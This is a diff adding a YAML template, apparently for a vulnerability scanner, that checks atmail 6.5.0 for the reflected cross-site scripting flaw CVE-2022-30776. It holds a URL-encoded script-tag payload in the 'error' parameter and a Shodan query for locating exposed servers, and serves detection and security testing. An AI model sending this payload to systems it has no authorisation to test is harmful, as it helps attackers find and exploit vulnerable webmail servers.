diff --git a/cves/2022/CVE-2022-30776.yaml b/cves/2022/CVE-2022-30776.yaml new file mode 100644 index 0000000000..bc8854928d --- /dev/null +++ b/cves/2022/CVE-2022-30776.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-30776 + +info: + name: Atmail - Cross Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter. + reference: + - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 + - https://www.atmail.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 + metadata: + verified: true + shodan-query: http.html:"atmail" + tags: cve,cve2022,atmail,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Error: 1" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200